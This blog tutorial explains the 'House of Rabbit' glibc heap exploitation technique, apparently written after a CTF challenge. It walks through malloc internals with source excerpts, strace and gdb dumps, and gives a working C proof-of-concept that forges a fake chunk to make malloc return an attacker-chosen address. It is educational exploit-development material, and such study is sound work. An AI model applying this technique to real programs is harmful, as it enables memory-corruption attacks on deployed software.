Extra Heap Exploitation: House-of-Rabbit

Introduction

In recent HITB XCTF, this technique is used in one heap challenge. I think it’s necessary to give a basic introduction on this also as an extension on my tutorial on largebin in ptmalloc.
The criteria for this exploitation technique is strict compared to other techniques and requires a lot of manual craft to assure the exploit is successful. The advantage of this technique is that the whole exploitation no longer depends on the knowledge of the base address of libc. But the advantage is limited as we still need a known address in advance, which can by repeatedly and reliably modified. Maybe the CTF community may find more potential of such technique in future.
The original information about this technique can be found in [1]. My post is based on this blog.

Background

Before introducing the House of Rabbit, let me first explain some important codes that will be used.
The whole test is run on Kali with glibc-2.24.

malloc parameter

static struct malloc_par mp_ =
{
  .top_pad = DEFAULT_TOP_PAD,
  .n_mmaps_max = DEFAULT_MMAP_MAX,
  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
  .arena_test = NARENAS_FROM_NCORES (1)
};

The malloc parameter mp_ is a global variable, which defines the maximum size of mapped memory.

Let me use the following snippet of code to explain.

char *p = malloc(0xa00000);
free(p);
p = malloc(0xa00000);
free(p);

Before the first malloc, the status of _mp is given below:

(gdb) p/x mp_
{trim_threshold = 0x20000, top_pad = 0x20000, mmap_threshold = 0x20000, arena_test = 0x8, arena_max = 0x0, n_mmaps = 0x0, 
  n_mmaps_max = 0x10000, max_n_mmaps = 0x0, no_dyn_threshold = 0x0, mmapped_mem = 0x0, max_mmapped_mem = 0x0, sbrk_base = 0x0}

After the first malloc, the status of _mp is given below:

(gdb) p/x mp_
{trim_threshold = 0x20000, top_pad = 0x20000, mmap_threshold = 0x20000, arena_test = 0x8, arena_max = 0x0, n_mmaps = 0x1, 
  n_mmaps_max = 0x10000, max_n_mmaps = 0x1, no_dyn_threshold = 0x0, mmapped_mem = 0xa01000, max_mmapped_mem = 0xa01000, sbrk_base = 0x0}

After the first free, the status of _mp is given below:

(gdb) p/x mp_
{trim_threshold = 0x1402000, top_pad = 0x20000, mmap_threshold = 0xa01000, arena_test = 0x8, arena_max = 0x0, n_mmaps = 0x0, 
  n_mmaps_max = 0x10000, max_n_mmaps = 0x1, no_dyn_threshold = 0x0, mmapped_mem = 0x0, max_mmapped_mem = 0xa01000, sbrk_base = 0x0}

There are two parts of code that are involved in the operations above:

// Function: sysmalloc
/* update statistics */
int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
atomic_max (&mp_.max_n_mmaps, new);
unsigned long sum;
sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
atomic_max (&mp_.max_mmapped_mem, sum);
check_chunk (av, p);
return chunk2mem (p);
//Function: munmap_chunk
atomic_decrement (&mp_.n_mmaps);
atomic_add (&mp_.mmapped_mem, -total_size);

/* If munmap failed the process virtual memory address space is in a
   bad shape.  Just leave the block hanging around, the process will
   terminate shortly anyway since not much can be done.  */
__munmap ((char *) block, total_size);

Another interesting observation of the sample code is that the return value, i.e. the allocated memory are located in different area. To explain what happens, let me use strace first to see the syscall used of the sample code.

execve("./test_map", ["./test_map"], 0x7ffc0dbc66d0 /* 44 vars */) = 0
brk(NULL)                               = 0x1839000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f7f99b8f000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=131750, ...}) = 0
mmap(NULL, 131750, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f7f99b6e000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\320\3\2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=1689360, ...}) = 0
mmap(NULL, 3795360, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f7f995d0000
mprotect(0x7f7f99765000, 2097152, PROT_NONE) = 0
mmap(0x7f7f99965000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x195000) = 0x7f7f99965000
mmap(0x7f7f9996b000, 14752, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f7f9996b000
close(3)                                = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f7f99b6c000
arch_prctl(ARCH_SET_FS, 0x7f7f99b6c700) = 0
mprotect(0x7f7f99965000, 16384, PROT_READ) = 0
mprotect(0x600000, 4096, PROT_READ)     = 0
mprotect(0x7f7f99b92000, 4096, PROT_READ) = 0
munmap(0x7f7f99b6e000, 131750)          = 0
mmap(NULL, 10489856, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f7f98bcf000
munmap(0x7f7f98bcf000, 10489856)        = 0
brk(NULL)                               = 0x1839000
brk(0x225a000)                          = 0x225a000
exit_group(0)      

From the output above, we can see that the first heap is actually allocated through mmap syscall, and the second heap is allocated through brk syscall in the end. More details of this operation is located in the sysmalloc function, I may give another post on sysmalloc in future. For now, getting to know the difference of the two allocation is enough.

Malloc Consolidate

Let me review the trigger condition of malloc_consolidate from [2].

During the process of free, if the size is larger than or equal to 0x10000, the function malloc_consolidate will be triggered. The goal of malloc_consolidate is to put the separated chunks in fast bin into unsorted bin.
The involved code in House of Rabbit is the code below:

if (nextchunk != av->top) {
    nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

    if (!nextinuse) {
	size += nextsize;
	unlink(av, nextchunk, bck, fwd);
    } else
	clear_inuse_bit_at_offset(nextchunk, 0);

    first_unsorted = unsorted_bin->fd;
    unsorted_bin->fd = p;
    first_unsorted->bk = p;

    if (!in_smallbin_range (size)) {
        p->fd_nextsize = NULL;
	p->bk_nextsize = NULL;
    }

    //insert the chunk into unsorted bin
    set_head(p, size | PREV_INUSE);
    p->bk = unsorted_bin;
    p->fd = first_unsorted;
    set_foot(p, size);
}

House-of-Rabbit

So now, let me move to House-of-Rabbit with the sample code below:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char target[0x10] = "Hello world\n";
unsigned long gbuf[6] = {0};

int main()
{
	void *p, *fast, *small, *fake;
	char *victim;

	p = malloc(0xa00000); //#1
	free(p);              //#1

	p = malloc(0xa00000); //#2

	free(p);              //#2
	
	fast = malloc(0x10);  //#3
	small = malloc(0x80); //#4

	free(fast);           //#3

	gbuf[1] = 0x11;
	gbuf[3] = 0xfffffffffffffff1;

	fake = &gbuf[2];
	
	*(unsigned long**)fast = fake;
	free(small);          //#4

	gbuf[3] = 0xa00001;
	malloc(0xa00000);     //#5


	gbuf[3] = 0xfffffffffffffff1;


	malloc((void*)&target - (void*)(gbuf+2) - 0x20);  //#6

	malloc(0x10);         //#7
	return 0;
}

With the background knowledge introduced in the previous section, we know that after #2 free, we now have a heap chunk of size 0xa01000.
Before #4 free, we free fast and insert that into fast bin, then we craft a fake chunk in 0x601090 as below:

0x7ffff7dd3b00 <main_arena>:	0x0000000000000000	0x0000000000602000
0x7ffff7dd3b10 <main_arena+16>:	0x0000000000000000	0x0000000000000000
0x7ffff7dd3b20 <main_arena+32>:	0x0000000000000000	0x0000000000000000
0x7ffff7dd3b30 <main_arena+48>:	0x0000000000000000	0x0000000000000000
0x7ffff7dd3b40 <main_arena+64>:	0x0000000000000000	0x0000000000000000
0x7ffff7dd3b50 <main_arena+80>:	0x0000000000000000	0x00000000006020b0
0x7ffff7dd3b60 <main_arena+96>:	0x0000000000000000	0x00007ffff7dd3b58
0x7ffff7dd3b70 <main_arena+112>:	0x00007ffff7dd3b58	0x00007ffff7dd3b68
0x7ffff7dd3b80 <main_arena+128>:	0x00007ffff7dd3b68	0x00007ffff7dd3b78

(gdb) x/4gx 0x0000000000602000
0x602000:	0x0000000000000000	0x0000000000000021
0x602010:	0x0000000000601090	0x0000000000000000

(gdb) x/8gx 0x601080
0x601080 <gbuf>:	0x0000000000000000	0x0000000000000011
0x601090 <gbuf+16>:	0x0000000000000000	0xfffffffffffffff1
0x6010a0 <gbuf+32>:	0x0000000000000000	0x0000000000000000

As discussed on malloc_consilidte in previous section, the heap status after #4 free is given below:

0x7ffff7dd3b00 <main_arena>:	0x0000000100000000	0x0000000000000000
0x7ffff7dd3b10 <main_arena+16>:	0x0000000000000000	0x0000000000000000
0x7ffff7dd3b20 <main_arena+32>:	0x0000000000000000	0x0000000000000000
0x7ffff7dd3b30 <main_arena+48>:	0x0000000000000000	0x0000000000000000
0x7ffff7dd3b40 <main_arena+64>:	0x0000000000000000	0x0000000000000000
0x7ffff7dd3b50 <main_arena+80>:	0x0000000000000000	0x0000000000602000
0x7ffff7dd3b60 <main_arena+96>:	0x0000000000000000	0x0000000000601090
0x7ffff7dd3b70 <main_arena+112>:	0x0000000000601090	0x00007ffff7dd3b68
0x7ffff7dd3b80 <main_arena+128>:	0x00007ffff7dd3b68	0x00007ffff7dd3b78
0x7ffff7dd3b90 <main_arena+144>:	0x00007ffff7dd3b78	0x00007ffff7dd3b88
(gdb) x/20gx 0x601080
0x601080 <gbuf>:	0xfffffffffffffff0	0x0000000000000010
0x601090 <gbuf+16>:	0x0000000000000000	0xfffffffffffffff1
0x6010a0 <gbuf+32>:	0x00007ffff7dd3b58	0x00007ffff7dd3b58

Now, we have a fake chunk (0x601090) under attacker’s control in the unsorted bin. The next step is move the fake chunk into the large bin in the same way as discussed in A Revisit to Large Bin. To avoid the integrity check in iterating over the unsorted bin, we need to modify the size of fake chunk to 0xa0000.

After #5 malloc, we successfully put the fake chunk into large bin as expected as below:

0x7ffff7dd4320 <main_arena+2080>:	0x00007ffff7dd4308	0x00007ffff7dd4318
0x7ffff7dd4330 <main_arena+2096>:	0x00007ffff7dd4318	0x0000000000601090
0x7ffff7dd4340 <main_arena+2112>:	0x0000000000601090	0x00007ffff7dd4338
0x7ffff7dd4350 <main_arena+2128>:	0x00007ffff7dd4338	0x0000000000000000
0x7ffff7dd4360 <main_arena+2144>:	0x4000000000000000	0x00007ffff7dd3b00
0x7ffff7dd4370 <main_arena+2160>:	0x0000000000000000	0x0000000000000001
0x7ffff7dd4380 <main_arena+2176>:	0x0000000000a21000	0x0000000000a21000

//large bin at 0x601090
0x601080 <gbuf>:	0xfffffffffffffff0	0x0000000000000010
0x601090 <gbuf+16>:	0x0000000000000000	0x0000000000a00001
0x6010a0 <gbuf+32>:	0x00007ffff7dd4328	0x00007ffff7dd4328
0x6010b0:	0x0000000000601090	0x0000000000601090

Before #6 malloc, we reset the size if fake chunk as below:

0x601080 <gbuf>:	0xfffffffffffffff0	0x0000000000000010
0x601090 <gbuf+16>:	0x0000000000000000	0xfffffffffffffff1
0x6010a0 <gbuf+32>:	0x00007ffff7dd4328	0x00007ffff7dd4328
0x6010b0:	0x0000000000601090	0x0000000000601090
//requested size:
(gdb) p/x $rdi
$1 = 0xffffffffffffff90

Since type of requested size is unsigned long, we finally allocate a chunk of size 0xffffffffffffffa0 at 0x6010a0, and put the remaining chunk into the unsorted bin again:

0x7ffff7dd3b00 <main_arena>:	0x0000000100000000	0x0000000000000000
0x7ffff7dd3b10 <main_arena+16>:	0x0000000000000000	0x0000000000000000
0x7ffff7dd3b20 <main_arena+32>:	0x0000000000000000	0x0000000000000000
0x7ffff7dd3b30 <main_arena+48>:	0x0000000000000000	0x0000000000000000
0x7ffff7dd3b40 <main_arena+64>:	0x0000000000000000	0x0000000000000000
0x7ffff7dd3b50 <main_arena+80>:	0x0000000000000000	0x0000000001002010
0x7ffff7dd3b60 <main_arena+96>:	0x0000000000000000	0x0000000000601030
0x7ffff7dd3b70 <main_arena+112>:	0x0000000000601030	0x00007ffff7dd3b68
0x7ffff7dd3b80 <main_arena+128>:	0x00007ffff7dd3b68	0x00007ffff7dd3b78

0x601080 <gbuf>:	0x0000000000000050	0x0000000000000010
0x601090 <gbuf+16>:	0x0000000000000000	0xffffffffffffffa1
0x6010a0 <gbuf+32>:	0x00007ffff7dd4328	0x00007ffff7dd4328
0x6010b0:	0x0000000000601090	0x0000000000601090
0x6010c0:	0x0000000000000000	0x0000000000000000

At this time, the attack can trigger #7 malloc to get a chunk at known address and launch the attack.

Conclusion

Since this technique is limited because a buffer with known address is necessary for launching the attack. In principle, this technique can return a chunk at any given address. However, with the situation that base address of most libraries are randomized, only the address in given binary (with ASLR disabled) is available for attacker to use.

Reference

[1] http://shift-crops.hatenablog.com/entry/2017/09/16/001126
[2] https://raw.githubusercontent.com/cloudburst/libheap/master/heap.png

One thought on “Extra Heap Exploitation: House-of-Rabbit

Leave a comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.